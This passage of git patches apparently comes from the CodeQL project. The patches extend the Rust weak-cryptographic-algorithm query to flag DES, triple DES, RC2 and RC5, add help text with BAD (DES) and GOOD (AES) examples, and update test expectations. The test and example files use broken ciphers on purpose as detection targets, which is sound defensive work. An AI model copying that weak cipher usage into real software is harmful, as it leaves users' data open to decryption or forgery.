des_cipher4.decrypt_block_b2b(input.into(), data.into()); - let mut des_cipher5 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let mut des_cipher5 = Des::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] des_cipher5.encrypt_block_mut(data.into()); des_cipher5.decrypt_block_mut(data.into()); @@ -94,11 +94,11 @@ fn test_block_cipher( tdes_cipher4.decrypt_block(data.into()); // rc2 (broken) - let rc2_cipher1 = Rc2::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let rc2_cipher1 = Rc2::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] rc2_cipher1.encrypt_block(data.into()); rc2_cipher1.decrypt_block(data.into()); - let rc2_cipher2 = Rc2::new_from_slice(key).expect("fail"); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let rc2_cipher2 = Rc2::new_from_slice(key).expect("fail"); // $ Alert[rust/weak-cryptographic-algorithm] rc2_cipher2.encrypt_block(data.into()); rc2_cipher2.decrypt_block(data.into()); @@ -107,11 +107,11 @@ fn test_block_cipher( rc2_cipher3.decrypt_block(data.into()); // rc5 (broken) - let rc5_cipher1 = RC5_16_16_8::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let rc5_cipher1 = RC5_16_16_8::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] rc5_cipher1.encrypt_block(data.into()); rc5_cipher1.decrypt_block(data.into()); - let rc5_cipher2 = RC5_32_16_16::new_from_slice(key).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let rc5_cipher2 = RC5_32_16_16::new_from_slice(key).unwrap(); // $ Alert[rust/weak-cryptographic-algorithm] rc5_cipher2.encrypt_block(data.into()); rc5_cipher2.decrypt_block(data.into()); } From 6eb850c8cb5cadbd6ee66b0ceef9e13574957dcd Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 5 Dec 2024 16:49:10 +0000 Subject: [PATCH 0854/1267] Rust: Improve the model. --- .../lib/codeql/rust/frameworks/RustCrypto.qll | 18 ++++++++++++++---- .../CWE-327/BrokenCryptoAlgorithm.expected | 8 ++++++++ .../security/CWE-327/test_cipher.rs | 16 ++++++++-------- 3 files changed, 30 insertions(+), 12 deletions(-) diff --git a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll index 295ce8d9e63..e2142cfe0d9 100644 --- a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll +++ b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll @@ -6,6 +6,12 @@ private import rust private import codeql.rust.Concepts private import codeql.rust.dataflow.DataFlow +bindingset[algorithmName] +string simplifyAlgorithmName(string algorithmName) { + // the cipher library gives triple-DES names like "TdesEee2" and "TdesEde2" + if algorithmName.matches("Tdes%") then result = "3des" else result = algorithmName +} + /** * An operation that initializes a cipher through the `cipher::KeyInit` or * `cipher::KeyIvInit` trait, for example `Des::new` or `cbc::Encryptor::new`. @@ -15,13 +21,17 @@ class StreamCipherInit extends Cryptography::CryptographicOperation::Range, Data StreamCipherInit() { // a call to `cipher::KeyInit::new`, `cipher::KeyInit::new_from_slice`, - // `cipher::KeyIvInit::new` or `cipher::KeyIvInit::new_from_slices`. - exists(Path p | + // `cipher::KeyIvInit::new`, `cipher::KeyIvInit::new_from_slices` or `rc2::Rc2::new_with_eff_key_len`. + exists(Path p, string rawAlgorithmName | this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath() = p and p.getResolvedCrateOrigin().matches("%/RustCrypto%") and p.getPart().getNameRef().getText() = - ["new", "new_from_slice", "new_from_slices"] and - algorithmName = p.getQualifier().getPart().getNameRef().getText() + ["new", "new_from_slice", "new_from_slices", "new_with_eff_key_len"] and + ( + rawAlgorithmName = p.getQualifier().getPart().getNameRef().getText() or + rawAlgorithmName = p.getQualifier().getPart().getGenericArgList().getGenericArg(0).(TypeArg).getTy().(PathType).getPath().getPart().getNameRef().getText() + ) and + algorithmName = simplifyAlgorithmName(rawAlgorithmName) ) } diff --git a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected index 69f0fed8534..f1395ff39ec 100644 --- a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected +++ b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected @@ -7,7 +7,15 @@ | test_cipher.rs:67:23:67:46 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:67:23:67:46 | ...::new_from_slice(...) | The cryptographic algorithm DES | | test_cipher.rs:71:23:71:42 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:71:23:71:42 | ...::new(...) | The cryptographic algorithm DES | | test_cipher.rs:75:27:75:46 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:75:27:75:46 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:80:24:80:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:80:24:80:48 | ...::new(...) | The cryptographic algorithm 3DES | +| test_cipher.rs:84:24:84:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:84:24:84:48 | ...::new(...) | The cryptographic algorithm 3DES | +| test_cipher.rs:88:24:88:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:88:24:88:48 | ...::new(...) | The cryptographic algorithm 3DES | +| test_cipher.rs:92:24:92:52 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:92:24:92:52 | ...::new_from_slice(...) | The cryptographic algorithm 3DES | | test_cipher.rs:97:23:97:42 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:97:23:97:42 | ...::new(...) | The cryptographic algorithm RC2 | | test_cipher.rs:101:23:101:46 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:101:23:101:46 | ...::new_from_slice(...) | The cryptographic algorithm RC2 | +| test_cipher.rs:105:23:105:56 | ...::new_with_eff_key_len(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:105:23:105:56 | ...::new_with_eff_key_len(...) | The cryptographic algorithm RC2 | | test_cipher.rs:110:23:110:50 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:110:23:110:50 | ...::new(...) | The cryptographic algorithm RC5 | | test_cipher.rs:114:23:114:55 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:114:23:114:55 | ...::new_from_slice(...) | The cryptographic algorithm RC5 | +| test_cipher.rs:132:23:132:76 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:132:23:132:76 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:138:23:138:76 | ...::new_from_slices(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:138:23:138:76 | ...::new_from_slices(...) | The cryptographic algorithm DES | +| test_cipher.rs:141:23:141:76 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:141:23:141:76 | ...::new(...) | The cryptographic algorithm DES | diff --git a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs index bcb78b32db4..0cf20c4c278 100644 --- a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs +++ b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs @@ -77,19 +77,19 @@ fn test_block_cipher( des_cipher5.decrypt_block_mut(data.into()); // triple des (broken) - let tdes_cipher1 = TdesEde2::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let tdes_cipher1 = TdesEde2::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] tdes_cipher1.encrypt_block(data.into()); tdes_cipher1.decrypt_block(data.into()); - let tdes_cipher2 = TdesEde3::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let tdes_cipher2 = TdesEde3::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] tdes_cipher2.encrypt_block(data.into()); tdes_cipher2.decrypt_block(data.into()); - let tdes_cipher3 = TdesEee2::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let tdes_cipher3 = TdesEee2::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] tdes_cipher3.encrypt_block(data.into()); tdes_cipher3.decrypt_block(data.into()); - let tdes_cipher4 = TdesEee3::new_from_slice(key).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let tdes_cipher4 = TdesEee3::new_from_slice(key).unwrap(); // $ Alert[rust/weak-cryptographic-algorithm] tdes_cipher4.encrypt_block(data.into()); tdes_cipher4.decrypt_block(data.into()); @@ -102,7 +102,7 @@ fn test_block_cipher( rc2_cipher2.encrypt_block(data.into()); rc2_cipher2.decrypt_block(data.into()); - let rc2_cipher3 = Rc2::new_with_eff_key_len(key, 64); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let rc2_cipher3 = Rc2::new_with_eff_key_len(key, 64); // $ Alert[rust/weak-cryptographic-algorithm] rc2_cipher3.encrypt_block(data.into()); rc2_cipher3.decrypt_block(data.into()); @@ -129,15 +129,15 @@ fn test_cbc( _ = aes_cipher1.encrypt_padded_mut::(data, data_len).unwrap(); // des (broken) - let des_cipher1 = cbc::Encryptor::::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher1 = cbc::Encryptor::::new(key.into(), iv.into()); // $ Alert[rust/weak-cryptographic-algorithm] _ = des_cipher1.encrypt_padded_mut::(data, data_len).unwrap(); let des_cipher2 = MyDesEncryptor::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] _ = des_cipher2.encrypt_padded_mut::(data, data_len).unwrap(); - let des_cipher3 = cbc::Encryptor::::new_from_slices(&key, &iv).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher3 = cbc::Encryptor::::new_from_slices(&key, &iv).unwrap(); // $ Alert[rust/weak-cryptographic-algorithm] _ = des_cipher3.encrypt_padded_mut::(data, data_len).unwrap(); - let des_cipher4 = cbc::Encryptor::::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher4 = cbc::Encryptor::::new(key.into(), iv.into()); // $ Alert[rust/weak-cryptographic-algorithm] _ = des_cipher4.encrypt_padded_b2b_mut::(input, data).unwrap(); } From dd0fa791aa49bffe3fae5b57f92683396dbd916a Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 5 Dec 2024 17:28:45 +0000 Subject: [PATCH 0855/1267] Rust: Add qhelp. --- .../CWE-327/BrokenCryptoAlgorithm.qhelp | 62 +++++++++++++++++++ .../CWE-327/BrokenCryptoAlgorithmBad.rs | 2 + .../CWE-327/BrokenCryptoAlgorithmGood.rs | 2 + 3 files changed, 66 insertions(+) create mode 100644 rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp create mode 100644 rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmBad.rs create mode 100644 rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmGood.rs diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp new file mode 100644 index 00000000000..f93c77e83f2 --- /dev/null +++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp @@ -0,0 +1,62 @@ + + + +

+ Using broken or weak cryptographic algorithms can leave data + vulnerable to being decrypted or forged by an attacker. +

+ +

+ Many cryptographic algorithms provided by cryptography + libraries are known to be weak, or flawed. Using such an + algorithm means that encrypted or hashed data is less + secure than it appears to be. +

+ +

+ This query alerts on any use of a weak cryptographic algorithm, that is + not a hashing algorithm. Use of broken or weak cryptographic hash + functions are handled by the + rust/weak-sensitive-data-hashing query. +

+ + + + +

+ Ensure that you use a strong, modern cryptographic + algorithm, such as AES-128 or RSA-2048. +

+ + + + +

+ The following code uses the des crate from the + RustCrypto family to encrypt some secret data. The + DES algorithm is old and considered very weak. +

+ + + +

+ Instead we should use a strong modern algorithm. In this + case we have selected the 256-bit version of the AES + algorithm. +

+ + + + + + +
  • NIST, FIPS 140 Annex a: Approved Security Functions.
    • +
  • NIST, SP 800-131A: Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths.
    • +
  • OWASP: Cryptographic Storage Cheat Sheet - Algorithms. +
    • +     + +     diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmBad.rs b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmBad.rs new file mode 100644 index 00000000000..3e86462c62a --- /dev/null +++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmBad.rs @@ -0,0 +1,2 @@ +let des_cipher = cbc::Encryptor::::new(key.into(), iv.into()); // BAD: weak encryption +let encryption_result = des_cipher.encrypt_padded_mut::(data, data_len); diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmGood.rs b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmGood.rs new file mode 100644 index 00000000000..6cafbc69bf7 --- /dev/null +++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithmGood.rs @@ -0,0 +1,2 @@ +let aes_cipher = cbc::Encryptor::::new(key.into(), iv.into()); // GOOD: strong encryption +let encryption_result = aes_cipher.encrypt_padded_mut::(data, data_len); From 4e418d3d4da22e3f093069869fdc3c302de23d1a Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 5 Dec 2024 18:54:15 +0000 Subject: [PATCH 0856/1267] Rust: Update for latest main, and autoformat. --- .../lib/codeql/rust/frameworks/RustCrypto.qll | 22 ++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll index e2142cfe0d9..1037c95b436 100644 --- a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll +++ b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll @@ -22,14 +22,26 @@ class StreamCipherInit extends Cryptography::CryptographicOperation::Range, Data StreamCipherInit() { // a call to `cipher::KeyInit::new`, `cipher::KeyInit::new_from_slice`, // `cipher::KeyIvInit::new`, `cipher::KeyIvInit::new_from_slices` or `rc2::Rc2::new_with_eff_key_len`. - exists(Path p, string rawAlgorithmName | - this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath() = p and + exists(PathExpr p, string rawAlgorithmName | + this.asExpr().getExpr().(CallExpr).getFunction() = p and p.getResolvedCrateOrigin().matches("%/RustCrypto%") and - p.getPart().getNameRef().getText() = + p.getPath().getPart().getNameRef().getText() = ["new", "new_from_slice", "new_from_slices", "new_with_eff_key_len"] and ( - rawAlgorithmName = p.getQualifier().getPart().getNameRef().getText() or - rawAlgorithmName = p.getQualifier().getPart().getGenericArgList().getGenericArg(0).(TypeArg).getTy().(PathType).getPath().getPart().getNameRef().getText() + rawAlgorithmName = p.getPath().getQualifier().getPart().getNameRef().getText() or + rawAlgorithmName = + p.getPath() + .getQualifier() + .getPart() + .getGenericArgList() + .getGenericArg(0) + .(TypeArg) + .getTypeRepr() + .(PathTypeRepr) + .getPath() + .getPart() + .getNameRef() + .getText() ) and algorithmName = simplifyAlgorithmName(rawAlgorithmName) ) From b59b90ba6df8950d224856905eb8efd82b6807b7 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 09:12:16 +0100 Subject: [PATCH 0857/1267] Rust: accept test changes --- .../canonical_path/canonical_paths.expected | 18 ++++++++--------- .../CONSISTENCY/AstConsistency.expected | 2 +- .../MethodCallExpr/MethodCallExpr.expected | 4 ++-- .../MethodCallExpr_getArgList.expected | 4 ++-- .../MethodCallExpr_getGenericArgList.expected | 2 +- .../MethodCallExpr_getNameRef.expected | 4 ++-- .../MethodCallExpr_getReceiver.expected | 4 ++-- .../ql/test/extractor-tests/utf8/ast.expected | 2 +- .../library-tests/controlflow/Cfg.expected | 12 +++++------ .../dataflow/global/inline-flow.expected | 14 ++++++------- .../dataflow/global/viableCallable.expected | 6 +++--- .../dataflow/local/inline-flow.expected | 6 +++--- .../test/library-tests/variables/Cfg.expected | 20 +++++++++---------- 13 files changed, 49 insertions(+), 49 deletions(-) diff --git a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected index 09583dcf9f6..4f0f2ec96fb 100644 --- a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected +++ b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected @@ -1,7 +1,7 @@ canonicalPaths | anonymous.rs:1:1:1:26 | Use | None | None | | anonymous.rs:3:1:32:1 | fn canonicals | repo::test | crate::anonymous::canonicals | -| anonymous.rs:4:5:4:23 | Struct | repo::test | {0}::OtherStruct | +| anonymous.rs:4:5:4:23 | struct OtherStruct | repo::test | {0}::OtherStruct | | anonymous.rs:6:5:8:5 | trait OtherTrait | repo::test | {0}::OtherTrait | | anonymous.rs:7:9:7:20 | fn g | repo::test | {0}::OtherTrait::g | | anonymous.rs:10:5:12:5 | impl OtherTrait for OtherStruct { ... } | None | None | @@ -11,13 +11,13 @@ canonicalPaths | anonymous.rs:18:5:20:5 | impl ...::Trait for OtherStruct { ... } | None | None | | anonymous.rs:19:9:19:22 | fn f | repo::test | <{0}::OtherStruct as crate::regular::Trait>::f | | anonymous.rs:22:5:24:5 | fn nested | repo::test | {0}::nested | -| anonymous.rs:23:9:23:27 | Struct | repo::test | {1}::OtherStruct | +| anonymous.rs:23:9:23:27 | struct OtherStruct | repo::test | {1}::OtherStruct | | anonymous.rs:26:5:31:5 | fn usage | repo::test | {0}::usage | | anonymous.rs:34:1:36:1 | fn other | repo::test | crate::anonymous::other | -| anonymous.rs:35:5:35:23 | Struct | repo::test | {36}::OtherStruct | +| anonymous.rs:35:5:35:23 | struct OtherStruct | repo::test | {36}::OtherStruct | | lib.rs:1:1:1:14 | mod anonymous | repo::test | crate::anonymous | | lib.rs:2:1:2:12 | mod regular | repo::test | crate::regular | -| regular.rs:1:1:2:18 | Struct | repo::test | crate::regular::Struct | +| regular.rs:1:1:2:18 | struct Struct | repo::test | crate::regular::Struct | | regular.rs:4:1:6:1 | trait Trait | repo::test | crate::regular::Trait | | regular.rs:5:5:5:16 | fn f | repo::test | crate::regular::Trait::f | | regular.rs:8:1:10:1 | impl Trait for Struct { ... } | None | None | @@ -38,17 +38,17 @@ canonicalPaths resolvedPaths | anonymous.rs:27:17:27:30 | OtherStruct {...} | repo::test | {0}::OtherStruct | | anonymous.rs:28:9:28:9 | s | None | None | -| anonymous.rs:28:9:28:13 | ... .f(...) | repo::test | <{0}::OtherStruct as crate::regular::Trait>::f | +| anonymous.rs:28:9:28:13 | s.f(...) | repo::test | <{0}::OtherStruct as crate::regular::Trait>::f | | anonymous.rs:29:9:29:9 | s | None | None | -| anonymous.rs:29:9:29:13 | ... .g(...) | repo::test | <{0}::OtherStruct as {0}::OtherTrait>::g | +| anonymous.rs:29:9:29:13 | s.g(...) | repo::test | <{0}::OtherStruct as {0}::OtherTrait>::g | | anonymous.rs:30:9:30:14 | nested | repo::test | {0}::nested | | regular.rs:27:13:27:21 | Struct {...} | repo::test | crate::regular::Struct | | regular.rs:28:5:28:5 | s | None | None | -| regular.rs:28:5:28:9 | ... .f(...) | repo::test | ::f | +| regular.rs:28:5:28:9 | s.f(...) | repo::test | ::f | | regular.rs:29:5:29:5 | s | None | None | -| regular.rs:29:5:29:9 | ... .g(...) | repo::test | ::g | +| regular.rs:29:5:29:9 | s.g(...) | repo::test | ::g | | regular.rs:30:5:30:5 | s | None | None | -| regular.rs:30:5:30:9 | ... .h(...) | repo::test | <_ as crate::regular::TraitWithBlanketImpl>::h | +| regular.rs:30:5:30:9 | s.h(...) | repo::test | <_ as crate::regular::TraitWithBlanketImpl>::h | | regular.rs:31:5:31:8 | free | repo::test | crate::regular::free | | regular.rs:41:9:41:26 | ...::None::<...> | lang:core | crate::option::Option::None | | regular.rs:42:9:42:20 | ...::Some | lang:core | crate::option::Option::Some | diff --git a/rust/ql/test/extractor-tests/generated/MacroItems/CONSISTENCY/AstConsistency.expected b/rust/ql/test/extractor-tests/generated/MacroItems/CONSISTENCY/AstConsistency.expected index d977579474b..cff0de0b5af 100644 --- a/rust/ql/test/extractor-tests/generated/MacroItems/CONSISTENCY/AstConsistency.expected +++ b/rust/ql/test/extractor-tests/generated/MacroItems/CONSISTENCY/AstConsistency.expected @@ -1,5 +1,4 @@ noLocation -| file://:0:0:0:0 | ... .parent(...) | | file://:0:0:0:0 | ... .unwrap(...) | | file://:0:0:0:0 | ...: ... | | file://:0:0:0:0 | ...::Path | @@ -35,6 +34,7 @@ noLocation | file://:0:0:0:0 | path | | file://:0:0:0:0 | path | | file://:0:0:0:0 | path | +| file://:0:0:0:0 | path.parent(...) | | file://:0:0:0:0 | std | | file://:0:0:0:0 | std | | file://:0:0:0:0 | std | diff --git a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr.expected b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr.expected index d6c0d90cd75..2922152a234 100644 --- a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr.expected +++ b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr.expected @@ -1,2 +1,2 @@ -| gen_method_call_expr.rs:5:5:5:13 | ... .foo(...) | hasArgList: | yes | getNumberOfAttrs: | 0 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasGenericArgList: | no | hasNameRef: | yes | hasReceiver: | yes | -| gen_method_call_expr.rs:6:5:6:25 | ... .foo(...) | hasArgList: | yes | getNumberOfAttrs: | 0 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasGenericArgList: | yes | hasNameRef: | yes | hasReceiver: | yes | +| gen_method_call_expr.rs:5:5:5:13 | x.foo(...) | hasArgList: | yes | getNumberOfAttrs: | 0 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasGenericArgList: | no | hasNameRef: | yes | hasReceiver: | yes | +| gen_method_call_expr.rs:6:5:6:25 | x.foo(...) | hasArgList: | yes | getNumberOfAttrs: | 0 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasGenericArgList: | yes | hasNameRef: | yes | hasReceiver: | yes | diff --git a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getArgList.expected b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getArgList.expected index e6fad5c36ec..c9d10231cd9 100644 --- a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getArgList.expected +++ b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getArgList.expected @@ -1,2 +1,2 @@ -| gen_method_call_expr.rs:5:5:5:13 | ... .foo(...) | gen_method_call_expr.rs:5:10:5:13 | ArgList | -| gen_method_call_expr.rs:6:5:6:25 | ... .foo(...) | gen_method_call_expr.rs:6:22:6:25 | ArgList | +| gen_method_call_expr.rs:5:5:5:13 | x.foo(...) | gen_method_call_expr.rs:5:10:5:13 | ArgList | +| gen_method_call_expr.rs:6:5:6:25 | x.foo(...) | gen_method_call_expr.rs:6:22:6:25 | ArgList | diff --git a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getGenericArgList.expected b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getGenericArgList.expected index dd1ed8c0304..51e1108ebb2 100644 --- a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getGenericArgList.expected +++ b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getGenericArgList.expected @@ -1 +1 @@ -| gen_method_call_expr.rs:6:5:6:25 | ... .foo(...) | gen_method_call_expr.rs:6:10:6:21 | <...> | +| gen_method_call_expr.rs:6:5:6:25 | x.foo(...) | gen_method_call_expr.rs:6:10:6:21 | <...> | diff --git a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getNameRef.expected b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getNameRef.expected index ba9fb15a113..9f20d2b07dd 100644 --- a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getNameRef.expected +++ b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getNameRef.expected @@ -1,2 +1,2 @@ -| gen_method_call_expr.rs:5:5:5:13 | ... .foo(...) | gen_method_call_expr.rs:5:7:5:9 | foo | -| gen_method_call_expr.rs:6:5:6:25 | ... .foo(...) | gen_method_call_expr.rs:6:7:6:9 | foo | +| gen_method_call_expr.rs:5:5:5:13 | x.foo(...) | gen_method_call_expr.rs:5:7:5:9 | foo | +| gen_method_call_expr.rs:6:5:6:25 | x.foo(...) | gen_method_call_expr.rs:6:7:6:9 | foo | diff --git a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getReceiver.expected b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getReceiver.expected index b8e6631e189..b909a0f7793 100644 --- a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getReceiver.expected +++ b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getReceiver.expected @@ -1,2 +1,2 @@ -| gen_method_call_expr.rs:5:5:5:13 | ... .foo(...) | gen_method_call_expr.rs:5:5:5:5 | x | -| gen_method_call_expr.rs:6:5:6:25 | ... .foo(...) | gen_method_call_expr.rs:6:5:6:5 | x | +| gen_method_call_expr.rs:5:5:5:13 | x.foo(...) | gen_method_call_expr.rs:5:5:5:5 | x | +| gen_method_call_expr.rs:6:5:6:25 | x.foo(...) | gen_method_call_expr.rs:6:5:6:5 | x | diff --git a/rust/ql/test/extractor-tests/utf8/ast.expected b/rust/ql/test/extractor-tests/utf8/ast.expected index 560f834766e..f203c37ab44 100644 --- a/rust/ql/test/extractor-tests/utf8/ast.expected +++ b/rust/ql/test/extractor-tests/utf8/ast.expected @@ -12,7 +12,7 @@ | utf8_identifiers.rs:4:2:4:3 | ParamList | | utf8_identifiers.rs:4:5:4:6 | StmtList | | utf8_identifiers.rs:4:5:4:6 | { ... } | -| utf8_identifiers.rs:6:1:8:1 | Struct | +| utf8_identifiers.rs:6:1:8:1 | struct X | | utf8_identifiers.rs:6:8:6:8 | X | | utf8_identifiers.rs:6:10:8:1 | RecordFieldList | | utf8_identifiers.rs:7:5:7:5 | \u03b4 | diff --git a/rust/ql/test/library-tests/controlflow/Cfg.expected b/rust/ql/test/library-tests/controlflow/Cfg.expected index 3165b2354be..a2de927d5f1 100644 --- a/rust/ql/test/library-tests/controlflow/Cfg.expected +++ b/rust/ql/test/library-tests/controlflow/Cfg.expected @@ -19,10 +19,10 @@ edges | test.rs:11:23:11:34 | ...::new | test.rs:11:23:11:36 | ...::new(...) | | | test.rs:11:23:11:36 | ...::new(...) | test.rs:11:13:11:19 | map | | | test.rs:12:9:12:11 | map | test.rs:12:20:12:21 | 37 | | -| test.rs:12:9:12:27 | ... .insert(...) | test.rs:10:22:13:5 | { ... } | | +| test.rs:12:9:12:27 | map.insert(...) | test.rs:10:22:13:5 | { ... } | | | test.rs:12:9:12:28 | ExprStmt | test.rs:12:9:12:11 | map | | | test.rs:12:20:12:21 | 37 | test.rs:12:24:12:26 | "a" | | -| test.rs:12:24:12:26 | "a" | test.rs:12:9:12:27 | ... .insert(...) | | +| test.rs:12:24:12:26 | "a" | test.rs:12:9:12:27 | map.insert(...) | | | test.rs:18:5:24:5 | enter fn next | test.rs:18:13:18:13 | n | | | test.rs:18:5:24:5 | exit fn next (normal) | test.rs:18:5:24:5 | exit fn next | | | test.rs:18:13:18:13 | n | test.rs:18:13:18:18 | ...: i64 | match | @@ -194,8 +194,8 @@ edges | test.rs:99:19:99:25 | Some(...) | test.rs:99:9:103:9 | while ... { ... } | no-match | | test.rs:99:19:99:25 | Some(...) | test.rs:99:24:99:24 | x | match | | test.rs:99:24:99:24 | x | test.rs:100:17:100:17 | x | match | -| test.rs:99:29:99:32 | iter | test.rs:99:29:99:39 | ... .next(...) | | -| test.rs:99:29:99:39 | ... .next(...) | test.rs:99:19:99:25 | Some(...) | | +| test.rs:99:29:99:32 | iter | test.rs:99:29:99:39 | iter.next(...) | | +| test.rs:99:29:99:39 | iter.next(...) | test.rs:99:19:99:25 | Some(...) | | | test.rs:99:41:103:9 | { ... } | test.rs:99:15:99:39 | let ... = ... | | | test.rs:100:13:102:13 | if ... {...} | test.rs:99:41:103:9 | { ... } | | | test.rs:100:17:100:17 | x | test.rs:100:22:100:22 | 5 | | @@ -631,8 +631,8 @@ edges | test.rs:292:87:294:5 | { ... } | test.rs:292:5:294:5 | exit fn test_question_mark_operator_1 (normal) | | | test.rs:293:9:293:10 | Ok | test.rs:293:12:293:12 | s | | | test.rs:293:9:293:33 | Ok(...) | test.rs:292:87:294:5 | { ... } | | -| test.rs:293:12:293:12 | s | test.rs:293:12:293:27 | ... .parse(...) | | -| test.rs:293:12:293:27 | ... .parse(...) | test.rs:293:12:293:28 | TryExpr | | +| test.rs:293:12:293:12 | s | test.rs:293:12:293:27 | s.parse(...) | | +| test.rs:293:12:293:27 | s.parse(...) | test.rs:293:12:293:28 | TryExpr | | | test.rs:293:12:293:28 | 